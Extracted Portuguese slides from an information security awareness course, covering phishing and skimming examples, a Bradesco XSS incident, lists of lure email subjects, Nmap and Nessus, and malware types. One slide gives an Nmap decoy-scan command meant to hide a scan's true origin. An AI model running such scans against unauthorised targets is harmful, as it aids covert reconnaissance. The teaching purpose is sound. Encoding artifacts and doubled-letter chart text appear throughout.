tela e teclas 
digitadas
Ex2: Clonagem de cartĂŁo de banco 
129 
VisĂŁo 
completa da 
tela e teclas 
digitadas
Ex2: Clonagem de cartĂŁo de banco 
130 
Micro câmera 
Bateria 
Antena 
transmissora
Ex3: Email de promoção (roubo 
informação) 
131
Ex3: Email de promoção (roubo 
informação) 
132
Ex4: Antivirus Gratis 
133
Ex5: Engenharia Social 
¨ Ao atender um telefonema, o interlocutor se 
identifica como vice-diretor da empresa. VocĂŞ 
jĂĄ o viu pelos corredores, mas nunca falou 
com ele por telefone. Ele informa que se 
encontra na filial da empresa, em reuniĂŁo, e 
estĂĄ com problemas para acessar o sistema. 
Assim sendo, solicita a senha para que 
possa ter acesso. Informa, ainda, que estĂĄ 
acompanhado de 10 pessoas que possuem 
outros compromissos e que nĂŁo podem 
esperar por muito tempo. 
134
Ex6: Email Receita Federal 
135
CĂłpia de identidade visual de ĂłrgĂŁos 
pĂşblicos 
Pedido de 
download de 
arquivos / 
erros de 
portuguĂŞs
CĂłpia de identidade visual de 
entidades populares 
HistĂłria 
estranha e 
mal contada 
Necessidade 
urgente de 
download
Serviço inexistente 
Pedido de download de arquivos 
Ameaças
Uso de marca popular Distrbuição 
muito vantajosa 
de prĂŞmios 
Pedido de 
download de 
arquivo
Uso de marca popular 
Erro de portuguĂŞs 
DĂ­vida inexistente 
Falta de menção a endereço 
por extenso
Erro de portuguĂŞs
Falha no site do Bradesco permitiu 
ataque XSS 
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- 
inst-xss/) 
Criminosos brasileiros conseguiram descobrir um problema em uma 
página do Bradesco que permitia que a mesma fosse “alterada” por meio 
de links, possibilitando o uso do domĂ­nio do banco para todo tipo de 
atividade maliciosa. 
Para tal, crackers enviaram e-mail em massa contendo um link que 
explorava uma falha de XSS (Cross Site Scripting) existente em uma 
pĂĄgina localizada em institucional.bradesco.com.br. Se clicado, o link 
enviava informaçþes à pågina que causavam um comportamento 
indesejável, fazendo com que argumentos da query string — como é 
chamada a parte do link depois do ponto de interrogação (”asp?…”) — 
fossem inseridas como cĂłdigo, permitindo o ataque. 
Dias antes da publicação desta matÊria, a Linha Defensiva notificou o 
Bradesco. O banco removeu a pĂĄgina vulnerĂĄvel dentro de 
aproximadamente 48 horas, inutilizando o ataque. 
A mensagem contendo o link que explorava a brecha solicitava o 
recadastramento das “chaves de segurança” usadas nas transações através 
da Internet, convidando o usuĂĄrio a fazĂŞ-lo por meio do link. 
142
Falha no site do Bradesco permitiu 
ataque XSS 
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- 
inst-xss/) 
Como ĂŠ demonstrado na imagem, a maioria dos navegadores e os programas de e-mails 
não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo 
que a existĂŞncia do golpe seja percebida. 
Embora o e-mail tenha usado uma tĂŠcnica refinada que facilmente poderia enganar atĂŠ 
mesmo usuĂĄrios com certa experiĂŞncia, devido ao link camuflado, erros de ortografia 
caracterĂ­sticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail 
em massa usado pelos criminosos nĂŁo era compatĂ­vel com caracteres especiais, 
como acentos. 
143
Falha no site do Bradesco permitiu 
ataque XSS 
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- 
inst-xss/) 
XSS 
Cross Site Scripting, ou XSS, ĂŠ um tipo de vulnerabilidade onde determinada pĂĄgina de internet nĂŁo filtra 
suficientemente as informaçþes enviadas pelo navegador web, sendo possível fazê-la exibir conteúdos de 
outros sites, ou conteúdos especificados no próprio link ou outra informação. 
Um exemplo clåssico Ê a pågina de busca. Em geral, påginas de buscas exibem na tela a informação que 
está sendo procurada (por exemplo, “Você está procurando por: [termo de pesquisa]“). Se a exibição desta 
informação não for filtrada corretamente, a informação, em vez de exibida, serå interpretada como código 
HTML pelo navegador, possibilitando o ataque. 
Fóruns, livros de visitas e blogs (este último, devido à função de comentårios) podem ser vítimas do XSS 
permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetarĂĄ qualquer usuĂĄrio 
que o ver. Este ĂŠ o ataque de XSS persistente, ou tipo 2. 
O Bradesco foi alvo do XSS impermanente ou nĂŁo-persistente, tambĂŠm chamado de XSS tipo 1. 
O objetivo de ataques XSS Ê geralmente roubar informaçþes importantes da vítima, tais como os cookies 
de autenticação. PorÊm, XSS tambÊm pode ser usado para alterar os sites e usar da confiança depositada 
pelo internauta na pågina para persuadi-lo a enviar informaçþes sigilosas, ou para rodar código malicioso 
nos PCs de visitantes. 
A Linha Defensiva jĂĄ noticiou a respeito de brechas semelhantes no YouTube e no Orkut. 
Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail 
144 
e similares nĂŁo sejam clicados, a nĂŁo ser quando estava-se esperando absolutamente o e-mail em 
questĂŁo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que 
possível, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o 
que foi indicado no e-mail. 
Brechas de XSS tipo 2 sĂŁo difĂ­ceis de serem evitadas pelo usuĂĄrio, sendo a responsabilidade do site nesses 
casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.
Falha no site do Bradesco permitiu 
ataque XSS 
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- 
inst-xss/) 
Ao acessar o link, o internauta era direcionado para uma pĂĄgina do Bradesco 
(Index_Pesquisa.asp) que, vulnerĂĄvel a XSS, carregava outra pĂĄgina, hospedada em um 
domĂ­nio brasileiro (cujo nome nĂŁo foi divulgado por se tratar de um domĂ­nio legĂ­timo 
comprometido). 
Em ataques XSS, pĂĄginas legĂ­timas sĂŁo usadas de forma maliciosa e um cĂłdigo (no caso 
acima, um FRAMESET1) ĂŠ inserido na pĂĄgina legĂ­tima. O conteĂşdo da pĂĄgina serĂĄ, 
portanto, diferente do esperado. 
145
Lista de Hackers fornecida: 
¨ Amores On-line - cartão virtual - Equipe Carteiro Romântico - Uma pessoa que 
lhe admira enviou um cartĂŁo 
¨ As fotos que eu tinha prometido. Álbum pessoal de fotos 
¨ AVG Antivírus - Detectamos que seu E.Mail estå enviando mensagens 
contaminadas com o vĂ­rus w32. bugbear 
¨ Aviso - você estå sendo traído - veja as fotos 
¨ Aviso - você estå sendo traído - veja as imagens do motel 
¨ Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados - 
Contrato Pendente - Clique para fazer atualização 
¨ Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a 
promoçþes exclusivas? Clique na fechadura 
¨ Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao CrÊdito - 
Notificação - Pendências Financeiras - Baixar o arquivo de relatório de 
pendĂŞncias. 
¨ carnaval 2005 - veja o que rolou nos bastidores do carnaval de São Paulo 
¨ Cartão Terra - eu te amo - webcard enviado atravÊs do site Cartþes Terra 
¨ Cartão UOL - I love you - você recebeu um cartão musical - Para visualizar e 
ouvir escolha uma das imagens 
¨ Cartþes BOL - Você recebeu um cartão BOL 
¨ Cartþesnico.com - Seu amor criou um cartão para você 
¨ Checkline - Consultas de crÊdito on-line - Consultas no Serasa/SPC 
¨ Claro IdÊias - Grande chance de ganhar meio milhão de reais em ouro e 18 
carros 
¨ Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e 
equipamentos em urgĂŞncia
Lista de Hackers fornecida: 
¨ Correio Virtual - hi5 - Seu Amor te enviou este cartão 
¨ CPF cancelado ou pendente de regularização - verifique; seu CPF estå 
cancelado 
¨ Declaração de Imposto de Renda de 2005/06 - MinistÊrio da Fazenda - CPF 
Cancelado ou Pendente de Regularização 
¨ Ebay - your account could be suspended - Billing Department 
¨ Embratel - Comunicado de Cobrança - Aviso de Bloqueio 
¨ Embratel - Notificação Confidencial - Fatura de serviços prestados Clique para 
detalhamento da fatura 
¨ Emotion Cards - UOL - ParabÊns você recebeu um Presente Virtual 
¨ Febraban - Guia de Segurança - Febrasoft Security 
¨ Finasa - Nossa Caixa - Fraudes Bancårias - Febraban 
¨ Fininvest - dÊbito em atraso - pendências financeiras em seu CPF/CNPJ 
¨ Ganhe uma viagem a Paris - Guia Paris LumiÊre 
¨ Gmail - Gmail Amigo Oculto - Baixar Formulårio - E-mail de 1 Giga 
¨ Humortadela - Piada animada sempre amigos 
¨ Humortadela - você Ê 10 - acesse o link e sacaneie 
¨ Humortadela - você recebeu uma piada animada - Ver Piada Animada 
¨ Ibest - acesso gråtis e fåcil - discador ibest - 0800 conexão sem pulso telefônico. 
GrĂĄtis - Download 
¨ Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vídeo 
¨ Leiam esta informação IMPORTANTe 
¨ Martins Com Ltda - Setor de Compras - Orçamento 
¨ Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento 
nĂŁo for quitado acionaremos departamento jurĂ­dico
Lista de Hackers fornecida: 
¨ Olå, hå quanto tempo! Eu me mudei para os Estados Unidos, e perdemos 
contato... 
¨ Olha o que a Globo preparou para você neste ano de 2005 - Big Brother Brasil 5 
- Baixe o vĂ­deo 
¨ Overture - Promoção para novos assinantes - Tem cliente procurando, tem você 
oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar 
¨ Paparazzo - globo. com - se você gostou de uma espiada no vídeo 
¨ Parperfeito - Você foi adicionado aos prediletos - Associado do Par Perfeito 
¨ Passe Livre de 7 dias no Globo Media Center 
¨ Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu 
fotolog e concorra 
¨ Radio Terra - dedique uma música 
¨ Receita Federal - CPF cancelado ou pendente de regularização 
¨ Saudades de você - Sou alguÊm que te conheceu hå muito tempo, e tive que 
fazer uma viagem - Espero que goste das fotos 
¨ SERASA - pendências referentes a seu nome - Extrato de dÊbito 
¨ SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dÊbitos 
¨ Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mão 
¨ Sou um amigo seu - você estå sendo traído - veja as fotos 
¨ Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença para 
1 ano grĂĄtis 
¨ Terra Cartþes - O meu melhor presente Ê você 
¨ Tim pós pago - pendências no SPC - Sistema de Proteção aoCrÊdito - Serial do 
Celular
Lista de Hackers fornecida: 
¨ Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do Microsoft 
Windows - Windows XP fica a cara de quem recebe um cartĂŁo Voxcards 
¨ Microsoft Software - Este conteúdo foi testado e Ê fornecido a você pela 
Microsoft Corporation - Veja as novidades 
¨ Music Cards - Confirmação 
¨ Necktsun ComÊrcio Ltda - Palmas - Departamento de Vendas - Orçamento 
¨ Netcard Cartþes Virtuais - Emoçþes de verdade 
¨ Norton Antivírus - Alerta de Segurança - download do antídoto para o Ms. 
Bruner 
¨ Notificação Confidencial - Pendências Financeiras em seu CPF 
¨ O carteiro - você recebeu um cartão de quem te admira 
¨ O carteiro. com - tenho uma novidade para você - veja o cartão que preparei 
¨ Voxcards - cartão voxcards - para quem você vai mandar um cartão hoje? 
¨ Voxcards - mensageiro - você estå recebendo um cartão virtual voxcards - 
Precisa instalar o plugin - clique para instalar 
¨ Webcard Terra - Feliz Dia das Mães - Existe um presente especial esperando 
por vocĂŞ no site de cartĂľes do terra. 
¨ Week - Complimentary Subscription Confirmation - Free - Please Apply online - 
PC Week 
¨ www. symantec. com - A solução Antivírus mais confiåvel do mundo 
¨ www.microsoft. com - Proteja seu computador com antivírus
Lista de Hackers fornecida: 
¨ UOL - Promoção Cultural - Cara cadê meu carro 
¨ UOL Cartþes - Estou com saudades - clique para visualizar 
¨ UOL Cartþes - Seu amor lhe enviou um cartão - clique para baixar 
¨ UOL Cartþes - Você recebeu um lindo cartão virtual 
¨ Veja as fotos proibidas das musas do bbb5 
¨ Viagens contaminadas com o w32. bugbear 
¨ Virtual Cards - Um grande abraço da equipe virtual cards - ler cartão 
¨ VIVO - Torpedos Web Gratuito - Torpedo Fåcil Vivo 
¨ Yahoo Cartþes - Você Ê tudo para mim - clique na imagem 
¨ Yahoo Cartþes - Você Ê tudo para mim - enviado por quem te admira 
¨ Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! 
¨ Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' 
ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para 
sairmos' , etc... 
¨ E, finalmente, para ter certeza que Ê de um golpe que você estå sendo vítima, 
passe o mouse - sem clicar - pela palavra do direcionamento : vocĂŞ vai ver, na 
barra inferior - Ă  esquerda da tela -, que se trata de um arquivo com a 
terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vão) espionar seu 
computador, roubando seus dados, senhas, etc.
Symantec: relatĂłrio mapeia mercado negro de dados 
¨ Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O 
relatório traz o preço das informaçþes negociadas por criminosos e mostra 
como as empresas podem ter prejuĂ­zos com a vulnerabilidade dos dados dos 
clientes. 
Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, jå existe um 
ecossistema criado em torno do roubo de dados. “Quem rouba nem sempre 
vende os dados. A gente fala de crime organizado, mas o que existe ĂŠ um 
grande mercado”, afirma o executivo. 
Veja tabela com o preço dos dados no mercado negro: 
¨ Produto Preço 
Contas bancĂĄrias de 10 dĂłlares a mil dĂłlares 
CartĂľes de crĂŠdito de 0,40 dĂłlar a 20 dĂłlares 
Identidades completas de 1 dĂłlar a 15 dĂłlares 
Contas do eBay de 1 dĂłlar a 18 dĂłlares 
Senhas de e-mail de 4 dĂłlares a 30 dĂłlares 
Proxies de 1,5 dĂłlar a 30 dĂłlares 
CW Connect - No grupo de discussĂŁo sobre Crimes Digitais do CW Connect, 
a primeira rede social para profissionais de tecnologia da informação e 
telecomunicaçþes do mercado, uma das participantes - a analista Fabiana - 
inseriu uma pesquisa sobre as principais ameaças às informaçþes da empresa: 
¨ 1 - Vírus 75% (Por falta de conhecimento os usuårios baixam programas sem 
conhecimento, acessam sites suspeitos, etc) 
2 - Divulgação de senhas 57% 
3 - Hackers 44% 
4 - FuncionĂĄrios insatisfeitos 42% 
5 - Acessos indevidos 40% 
6 - Vazamento de informaçþes 33%
152
TÊcnicas para Alcançar os Objetivos 
da Segurança 
¨Deve-se perguntar: 
153 
– Proteger O QUÊ? 
– Proteger DE QUEM? 
– Proteger A QUE CUSTOS? 
– Proteger COM QUE RISCOS? 
¨O axioma da segurança Ê bastante 
conhecido de todos, mas ĂŠ verdadeiro: 
– "Uma corrente não é mais forte do que o 
seu elo mais fraco"
154 
Custo de Segurança:
155 
Custo Visiveis x Invisiveis:
AA mmaaiioorriiaa ddooss 
aattaaqquueess 
aaccoonntteeccee aaqquuii 
PPrroodduuttoo 
LLaannççaaddoo 
VVuullnneerraabbiilliiddaaddee 
ddeessccoobbeerrttaa 
FFiixx 
ddiissppoonnĂ­Ă­vveell 
FFiixx iinnssttaallaaddoo 
ppeelloo cclliieennttee 
Atualização do ambiente 
Quando as ameaças ocorrem?
Atualização do ambiente 
Tempo para a invasĂŁo diminuindo 
PPrroodduuttoo 
LLaannççaaddoo 
InvasĂŁo 
O tempo (em dias) 
entre a disponibilização 
VVuullnneerraabbiilliiddaaddee 
ddeessccoobbeerrttaa 
da correção e a 
FFiixx 
ddiissppoonnĂ­Ă­vveell 
FFiixx iinnssttaallaaddoo 
ppeelloo cclliieennttee 
invasĂŁo tem diminuĂ­do, 
portanto a aplicação de 
“patches” não pode ser 
a Ăşnica defesa em 
grandes empresas 
18 151 
0 
331 
BBllaassttee 
rr 
WWeellcchhii 
aa// 
NNaacchhii 
NNiimmdd 
aa 
25 
SSQQLL 
SSllaammmm 
eerr 
14 
SSaasssseerr
Atualização do ambiente 
Worm Zotob 
¨ 09/08 - A Microsoft 
publica a correção 
¨ 11/08 - A Microsoft 
informa que um 
ataque estĂĄ na 
eminencia de 
acontecer sobre essa 
vulnerabilidade 
¨ 17/08 - CNN e ABC 
sĂŁo atacadas
Principais Ameaças 
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
Principais ObstĂĄculos 
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
Anålise de Segurança 
161 
¨ São falhas em serviços, aplicativos e sistemas 
operacionais que pode acarretar acesso ao 
sistemas parcial ou total em nĂ­vel de 
administração. 
¨ Hoje temos ferramentas de escaneamento de 
vulnerabilidades que detecta falhas de sistemas, 
mais tambĂŠm sĂŁo utilizadas para invasĂŁo. 
¨ Segundo o site sectools.org temos as 10 principais 
ferramentas de escaneamento de vulnerabilidades 
de sistemas. 
– Nessus, GFI LANguard, Retina, Core Impact, 
ISS Internet Scanner, X-scan, Sara, 
QualysGuard, SAINT, MBSA
162 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NMAP 
- É uma ferramenta para exploração de rede criada 
pelo Fyodor. É uma das ferramentas mais 
importantes para engenharia de segurança ou pen-tester. 
Com ele vocĂŞ poderĂĄ entrar em uma rede e 
buscar serviços que estão escutando em cada porta 
especifica. VocĂŞ pode fazer um varredura de 
tcp()connect que farĂĄ uma conexĂŁo completa com o 
host ou uma syn scan que farĂĄ uma simples conexĂŁo 
que servirĂĄ para testar regras de firewall por 
exemplo.
163 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NMAP (I) 
Alvo: 
MS-Windows 95 
modificado
164 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NMAP (II) 
Alvo: 
Linux Mandrake 
modificado
165 
Soluçþes para a Insegurança 
Informåtica ¨NMAP (comandos) 
Um rastreio(scan) 
tĂ­pico do Nmap ĂŠ 
mostrado em 
Example 1, “Uma 
amostra de 
rastreio(scan) do 
Nmap”. Os únicos 
argumentos que o 
Nmap utiliza nesse 
exemplo sĂŁo -A para 
permitir a detecção de 
SO e a versĂŁo -T4 
para execução mais 
rĂĄpida e os nomes de 
anfitriĂŁo(hostnames) 
de dois alvos.
166 
Soluçþes para a Insegurança 
Informåtica ¨NMAP (comandos - Ubuntu) 
Version detection: 
ApĂłs as portas TCP 
e/ou UDP serem 
descobertas por 
algum dos mĂŠtodos, o 
nmap irĂĄ determinar 
qual o serviço estå 
rodando atualmente. 
O arquivo nmap-service- 
probes ĂŠ 
utilizado para 
determinar tipos de 
protocolos, nome da 
aplicação, número da 
versĂŁo e outros 
detalhes
167 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NMAP (comandos - Ubuntu) 
D <decoy1,[decoy2],[SEU_IP]...> 
Durante uma varredura, utiliza uma sĂŠrie de 
endereços falsificados, simulando que o scanning 
tenha originado desses vĂĄrios hosts, sendo 
praticamente impossĂ­vel identificar a verdadeira 
origem da varredura. 
sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP 
192.168.0.1
168 
Soluçþes para a Insegurança 
InformĂĄtica 
¨ Anålise de Segurança 
– Método de detecção remota de vulnerabilidades 
• Aplicações como o NMAP não tiram conclusões 
• Existe outro tipo de aplicação que efectua o levantamento 
remoto de recursos, detecta vulnerabilidades, alerta o utilizador 
ou lança ataques 
– NESSUS (Nessus Security Scanner) 
• É uma ferramenta sofisticada que funciona de forma semi-automática 
• Pode ser usada para obter relatórios de segurança informática 
• Também pode ser utilizada para “atacar “ uma plataforma 
• Incorpora ataques de negação de serviço, teste de exploits, etc 
• Facilita muito a actividade dos crackers
169 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS 
- AtĂŠ hĂĄ pouco tempo o Nessus sĂł funcionava no Linux, mas 
recentemente foi lançado o Nessus para Windows. É uma 
excelente ferramenta designada para testar e descobrir falhas 
de segurança (portas, vulnerabilidades, exploits) de uma ou 
mais mĂĄquinas. 
- Estas falhas ou problemas podem ser descobertos por um grupo 
hacker, um único hacker, uma empresa de segurança ou pelo 
prĂłprio fabricante, podendo ser de maneira acidental ou 
proposital, O Nessus ajuda a identificar e resolver estes 
problemas antes que alguĂŠm tire vantagem destes com 
propĂłsitos maliciosos.
170 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS 
Alvo: Linux 
SuSE 
Detectando 
Nmap
171 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS 
Alvo: MS-Windows 
95 
Detectando 
Nmpa
172 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS 
Alvo: Linux RedHat após instalação
173 
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS 
Verificação da 
pĂłpria mĂĄquina
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS - Report
Soluçþes para a Insegurança 
InformĂĄtica 
¨NESSUS – Report com formato HTML
VÍRUS
Tipos de Virus 
¨ Vírus de Boot 
Um dos primeiros tipos de vĂ­rus conhecido, o vĂ­rus de boot infecta a 
partição de inicialização do sistema operacional. Assim, ele Ê ativado 
quando o computador ĂŠ ligado e o sistema operacional ĂŠ carregado. 
¨ Time Bomb 
Os vĂ­rus do tipo "bomba de tempo" sĂŁo programados para se ativarem 
em determinados momentos, definidos pelo seu criador. Uma vez 
infectado um determinado sistema, o vĂ­rus somente se tornarĂĄ ativo e 
causarĂĄ algum tipo de dano no dia ou momento previamente definido. 
Alguns vĂ­rus se tornaram famosos, como o "Sexta-Feira 13" e o 
"Michelangelo". 
Minhocas, worm ou vermes 
Com o interesse de fazer um vĂ­rus se espalhar da forma mais 
abrangente possĂ­vel, seus criadores por vezes, deixaram de lado o 
desejo de danificar o sistema dos usuĂĄrios infectados e passaram a 
programar seus vĂ­rus de forma que apenas se repliquem, sem o 
objetivo de causar graves danos ao sistema. Desta forma, seus autores 
visam tornar suas criaçþes mais conhecidas na Internet. Este tipo de 
vĂ­rus passou a ser chamada de verme ou worm. Eles estĂŁo mais 
aperfeiçoados, jå hå uma versão que ao atacar a måquina hospedeira, 
nĂŁo sĂł se replica, mas tambĂŠm se propaga pela internet pelos e-mail 
que estĂŁo registrados no cliente de e-mail, infectando as mĂĄquinas que 
abrirem aquele e-mail, reiniciando o ciclo
Tipos de Virus (cont) ¨ Trojans ou cavalos de Tróia 
Certos vĂ­rus trazem em seu bojo um cĂłdigo a parte, que permite a um estranho acessar o 
micro infectado ou coletar dados e enviĂĄ-los pela Internet para um desconhecido, sem notificar 
o usuĂĄrio. Estes cĂłdigos sĂŁo denominados de Trojans ou cavalos de TrĂłia. 
Inicialmente, os cavalos de TrĂłia permitiam que o micro infectado pudesse receber comandos 
externos, sem o conhecimento do usuĂĄrio. Desta forma o invasor poderia ler, copiar, apagar e 
alterar dados do sistema. Atualmente os cavalos de TrĂłia agora procuram roubar dados 
confidenciais do usuĂĄrio, como senhas bancĂĄrias. 
Os vírus eram no passado, os maiores responsåveis pela instalação dos cavalos de Tróia, 
como parte de sua ação, pois eles não têm a capacidade de se replicar. Atualmente, os 
cavalos de TrĂłia nĂŁo mais chegam exclusivamente transportados por vĂ­rus, agora sĂŁo 
instalados quando o usuĂĄrio baixa um arquivo da Internet e o executa. PrĂĄtica eficaz devido a 
enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usuĂĄrios. Tais 
e-mails contÊm um endereço na Web para a vítima baixar o cavalo de Tróia, ao invÊs do 
arquivo que a mensagem diz ser. Esta prĂĄtica se denomina phishing,expressĂŁo derivada do 
verbo to fish, "pescar" em inglĂŞs. Atualmente, a maioria dos cavalos de TrĂłia visam sites 
bancĂĄrios, "pescando" a senha digitada pelos usuĂĄrios dos micros infectados. HĂĄ tambĂŠm 
cavalos de TrĂłia que ao serem baixados da internet "guardados" em falsos programas ou em 
anexos de e-mail, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt 
dĂĄ as "regras do jogo": os dados foram "seqĂźestrados" e sĂł serĂŁo "libertados" mediante 
pagamento em dinheiro para uma determinada conta bancĂĄria, quando serĂĄ fornecido o cĂłdigo 
restaurador. TambĂŠm os cavalos de trĂłia podem ser usados para levar o usuĂĄrio para sites 
falsos, onde sem seu conhecimento, serĂŁo baixados trojans para fins criminosos, como 
aconteceu com os links do google, pois uma falha de segurança poderia levar um usuårio para 
uma pågina falsa. Por este motivo o serviço esteve fora do ar por algumas horas para corrigir 
esse bug, pois caso contrĂĄrio as pessoas que nĂŁo distinguissem o site original do falsificado 
seriam afetadas. 
¨ Hijackers 
Hijackers sĂŁo programas ou scripts que "sequestram" navegadores de Internet, principalmente 
o Internet Explorer. Quando isso ocorre, o hijacker altera a pĂĄgina inicial do browser e impede 
o usuĂĄrio de mudĂĄ-la, exibe propagandas em pop-ups ou janelas novas, instala barras de 
ferramentas no navegador e podem impedir acesso a determinados sites (como sites de 
software antivĂ­rus, por exemplo).
Tipos de Virus (cont) 
¨ Vírus no Orkut 
Em torno de 2006 e 2007 houve muitas ocorrĂŞncias de vĂ­rus no Orkut que ĂŠ 
capaz de enviar scraps (recados) automaticamente para todos os contatos da 
vĂ­tima na rede social, alĂŠm de roubar senhas e contas bancĂĄrias de um micro 
infectado atravĂŠs da captura de teclas e cliques. Apesar de que aqueles que 
receberem o recado precisam clicar em um link para se infectar, a relação de 
confiança existente entre os amigos aumenta muito a possibilidade de o 
usuĂĄrio clicar sem desconfiar de que o link leva para um worm. Ao clicar no 
link, um arquivo bem pequeno ĂŠ baixado para o computador do usuĂĄrio. Ele se 
encarrega de baixar e instalar o restante das partes da praga, que enviarĂĄ a 
mensagem para todos os contatos do Orkut. AlĂŠm de simplesmente se 
espalhar usando a rede do Orkut, o vĂ­rus tambĂŠm rouba senhas de banco, em 
outras palavras, ĂŠ um clĂĄssico Banker. 
¨ Keylogger 
O KeyLogger ĂŠ uma das espĂŠcies de vĂ­rus existentes, o significado dos termos 
em inglĂŞs que mais se encaixa no contexto seria: Capturador de teclas . Ao 
serem executados, normalmente os keyloggers ficam escondidos no sistema 
operacional, sendo assim a vĂ­tima nĂŁo tem como saber que estĂĄ sendo 
monitorada. Atualmente os keyloggers sĂŁo desenvolvidos para meios ilĂ­citos, 
como por exemplo roubo de senhas bancĂĄrias. SĂŁo utilizados tambĂŠm por 
usuĂĄrios com um pouco mais de conhecimento para poder obter senhas 
pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers 
que capturam a tela da vĂ­tima, sendo assim, quem implantou o keylogger tem 
controle sobre o que a pessoa estĂĄ fazendo no computador. 
¨ Estado Zumbi 
O estado zumbi em um computador ocorre quando ĂŠ infectado e estĂĄ sendo 
controlado por terceiros. Podem usĂĄ-lo para disseminar, vĂ­rus , keyloggers, e 
procededimentos invasivos em geral. Usualmente esta situação ocorre pelo 
fato da mĂĄquina estar com seu Firewall e ou Sistema Operacional 
desatualizados. Segundo estudos na ĂĄrea, um computador que estĂĄ na 
internet nessas condiçþes tem quase 50% de chance de se tornar uma 
mĂĄquina zumbi, que dependendo de quem estĂĄ controlando, quase sempre 
com fins criminosos, como acontece vez ou outra, quando crackers sĂŁo presos 
por formar exĂŠrcitos zumbis para roubar dinheiro das contas correntes e 
extorquir.
Tipos de Virus (cont) 
¨ Vírus de E-mail 
AtĂŠ pouco tempo atrĂĄs nĂŁo existiam vĂ­rus de E-mail e todos os textos que circulavam 
sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se 
propagam por mails e nĂŁo necessitam que se execute qualquer programa anexado ou 
nĂŁo a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia. 
KakWorm : SĂł ataca as versĂľes inglesa e francesa do Outlook. Para que a 
contaminação aconteça basta que uma mensagem contaminada seja exibida no 
“painel de visualização”, sem necessidade de abrir o mail. Além de sua 
autopropagação, o principal efeito consiste no desligamento do computador. Ele se 
aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as 
mensagens levarĂŁo consigo o KakWorm. Todo primeiro dia do mĂŞs, Ă s17hs, ĂŠ 
apresentada a mensagem: “Kagou-Anti-Kro$oft says not today!”. Em seguida, o 
computador ĂŠ desligado. 
Romeu e Julieta : Ataca os computadores que usam as versĂľes 4.0, 4.01, 5.0, e 
5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, 
Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa 
instabilidades no computador contaminado. Uma caracterĂ­stica desse worm ĂŠ que o 
assunto (subject) da mensagem que contĂŠm o vĂ­rus varia e ĂŠ selecionado 
aleatoriamente entre os seguintes: 
Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - 
lol :) - ,,,… - !!! - newborn - merry christmas! - surprise ! - Caution: NEW 
VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world 
- !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry… - Hey you ! - 
Matrix has you… - my picture from shake-beer 
Davinia: É capaz de contaminar e de autopropagar-se sem a existência de um 
arquivo anexado Ă  mensagem, danifica todos os arquivos .html e os deixa 
irrecuperĂĄveis.
Tipos de Virus (cont) 
¨ Vírus de macro 
Quando se usa alguns programas, por exemplo um editor de texto, e 
necessita-se executar uma tarefa repetidas vezes em seqßência 
(por exemplo substituir todos os “eh” por “é”) pode-se editar um 
comando Ăşnico para efetuĂĄ-las. Esse comando ĂŠ chamado de 
macro, que pode ser salvo em um modelo para ser aplicado em 
outros arquivos. AlÊm dessa opção da própria pessoa fazer um 
modelo os comandos bĂĄsicos dos editores de texto tambĂŠm 
funcionam com modelos. Os vĂ­rus de macro atacam justamente 
esses arquivos comprometendo o funcionamento do programa. Os 
alvos principais sĂŁo os prĂłprios editores de texto (Word) e as 
planilhas de cĂĄlculo (Excel). 
A disseminação desse tipo de vírus Ê muito mais acentuada pois 
documentos sĂŁo muito mĂłveis e passam de mĂĄquina em mĂĄquina . 
Ao escrever, editar ou, simplesmente, ler arquivos vindos de 
computadores infectados a contaminação ocorre. Assim, 
verdadeiras “epidemias” podem acontecer em pouco tempo. Além 
